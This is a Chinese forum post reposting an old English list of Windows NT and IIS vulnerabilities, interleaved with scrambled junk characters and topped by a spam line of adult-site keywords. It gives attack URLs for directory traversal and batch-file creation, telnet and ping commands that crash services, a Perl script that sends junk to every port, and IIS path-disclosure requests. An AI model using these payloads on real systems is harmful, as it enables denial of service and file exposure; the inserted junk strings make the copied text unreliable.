久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>
          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        1. <th id="r7w9x"></th>
          1.  找回密碼
             注冊(cè)

            QQ登錄

            只需一步,快速開(kāi)始

            NT的漏洞及描述(英文)

            [復(fù)制鏈接]
            1#
            發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
            受影響系統(tǒng):4.0,iis 1.0
            : V% M! Q4 ], r) b" P7 s8 J4 ^( o- CA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
            * S8 s+ J9 x& H, ?: J
            % C- k  ~0 g6 D& `A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
            ' r/ H# z$ u. v$ {, ]
            % O2 X  L+ z4 T" @4 A, [- }By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.4 h2 ?, U) ?5 p8 t8 R; j$ \, J

            / {+ p* t# ?' J( x$ f) r: V, ^# K--------------------------------------------------------------------
            ( j8 `* L) X9 i: ]& R3 b) G2 N7 n9 S8 s7 e7 V  z2 C
            受影響系統(tǒng):4.0" g$ W/ y$ N: f# u
            A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
            $ l, M+ K, k3 V- C) U0 W8 i
            ' B  v# B0 g  y3 ?4 D  x- M5 _: gIf the file 'target.bat' exists, the file will be truncated.& `' K& t' {1 ^5 d6 _4 D; V

            9 I3 n7 |: q9 Y5 n/ x! W
            ' S7 f5 |" U  G7 e* E9 j6 ]A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
            , O& H$ x1 C" X4 P5 J  |& j; n* m; K6 Y  O& D# G& Q0 M
            ----------------------------------------------------------------------
            % |- z3 m% u: I, C3 ]2 m$ z2 E' C4 Z' w6 V! v3 U. J
            受影響系統(tǒng):3.51,4.0
            % H" P- [+ s' u) r4 m( e3 e4 b( mMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.' V9 `  L, ]5 y

            6 k( Q3 Y3 J1 {" aThe following steps;
            . B6 ^" R6 @, J) V
            9 q, {0 {% a  gTelnet to an NT 4.0 system on port 135
            " ~/ W( D: t/ D1 u6 d* @" W, Z" dType about 10 characters followed by a <CR>
            5 w$ b* C$ q! n& K2 a8 P( EExit Telnet ; Z$ M9 ~! L9 [9 P5 s! G& y
            results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
              J& ]/ w3 f2 r. P# U  r4 h0 c
            8 J/ F7 r  a. ^: mWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.( X* h$ j% p, Y$ B

            3 s8 F7 A# W- _1 D3 ]5 @+ VThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
            : L4 `5 c$ t1 C, }( K; _" t  \
            ' a( D. o, K+ b: EIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.8 v0 f5 _, _+ Y$ S. `3 F. P
            , u% B* n6 B& g1 x( i  |
            The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
            & x5 M" V; ?+ F, e8 p" b  H) _' g% R" L/ L, a
            /*begin poke code*/3 G# ?% w: d" L9 {1 Q! G. Y6 J3 \$ d

            " {7 ?# C' k0 i6 B- Uuse Socket;& X4 E3 }* `, T2 h* _' ~
            use FileHandle;
            2 p2 O7 B! p1 F# I+ zrequire "chat2.pl";; l4 n) b6 _* |7 ?6 R# E  _) l7 Y- p
            ! _1 k! L5 w' F  |3 z
            $systemname = $ARGV[0] && shift;
            ! D( g6 F, E! A% a) R
            * r7 z# c0 H# v$verbose = 1; # tell me what you're hitting
            , k' v# \# P7 E5 g% y$knownports = 1; # don't hit known problem ports) l. o8 {9 d5 r- ?* r' u
            for ($port = $0; $port<65535; $port++)
            ; f' o' N% Q6 d! j: W{
            8 y2 Q$ m' g; j2 N# p2 b7 ?5 c# g/ s) \+ |# u4 ?) A$ Y$ w

            ( z# T  u/ U9 g. a$ Kif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
            . }9 o- f8 E$ F1 k' h" ?1 snext;
            ! W+ n* R2 N# c' U8 ^2 M4 x& c}9 ?. X5 W  @; q# P) h* b% Y) ^% Y
            $fh = chat::open_port($systemname, $port);0 O# p# D, G6 Q
            chat::print ($fh,"This is about ten characters or more");
            ) ]8 |& `) M4 J$ y5 u: Hif ($verbose) {  e/ r& [& Q6 k; b
            print "Trying port: $port\n";2 {: c( a2 |& h
            }
            % h  A6 N8 K* {. dchat::close($fh);; y$ K/ m7 o" I" j

            6 @- l6 z2 M& l* M: ~0 b2 g' B. Q}
            / [* |5 Z% W; ^# W2 [( V' f6 j+ `8 H1 f
            + {! U+ ~' \  i, G
            /*end poke code*/$ B8 x* K. ~! ?, G4 W- q

            % ?, T5 }# ]* ]" s$ OSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
            + C/ k6 w0 b# N0 n& W
            0 s, U4 q( ^7 i* Z--------------------------------------------------------------------------------
            4 l9 p( o+ g. Y# [" Q: H, G& w& A3 Q: j. e' b7 |
            受影響系統(tǒng):4.03 {5 m/ [. D/ k' f. Q- d" a% i
            Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.; {  {! D% n6 h+ J# d/ L' q. X, N

            $ G  B5 q3 K# B1 y& CThis attack causes Dr. Watson to display an alert window and to log an error:
            2 U5 t) @$ N" r3 [' S6 V: D$ `9 |8 S& @. t2 E
            "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"8 Y2 z1 v& U3 ^& e/ u6 a; @0 R
            2 q9 j; `. Y+ B9 O
            --------------------------------------------------------------------------------
            6 S5 b# k  b. c  ~8 U. q
            " A& U5 Y% E. e% r受影響系統(tǒng):3.51,4.05 M4 j' J5 V0 k# L1 Y
            Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:: f9 @8 l% [6 \, C1 K; w/ \9 h
            # P3 m/ I0 q' z6 N  N
            STOP: 0X0000001E
            ; t' v2 S& \$ A8 J: OKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS% G# e: H8 b. X4 d
            - E( G" F6 Q& i7 c9 D# ?, O
            -OR-  ]+ S1 T& e% N9 \

            ' C: O8 h# O7 t& t: WSTOP: 0x0000000A& b4 C. }' }& y' w( x: T' c2 X' ~" p
            IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
            ) H$ |: E$ P6 e* p1 Q7 h- L
            & g) y' k" q4 I, R2 w, bNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.* A: N- \+ }, t

            ( m+ h4 d7 y3 X0 j* H--------------------------------------------------------------------------------4 G8 A6 r4 o  F4 z6 k" ~& g

            8 s  V) P7 V$ j) ]Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
            0 W, s& S3 h6 a  k! c( K
            3 N+ ]+ V, n5 H* L--------------------------------------------------------! s1 S# X. d9 W8 @$ X# g
            - V$ O" z& X3 S$ w" ]% ]0 k
            IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
            您需要登錄后才可以回帖 登錄 | 注冊(cè)

            本版積分規(guī)則

            QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

            GMT+8, 2025-7-14 01:40

            Powered by Discuz! X3.5

            © 2001-2025 Discuz! Team.

            快速回復(fù) 返回頂部 返回列表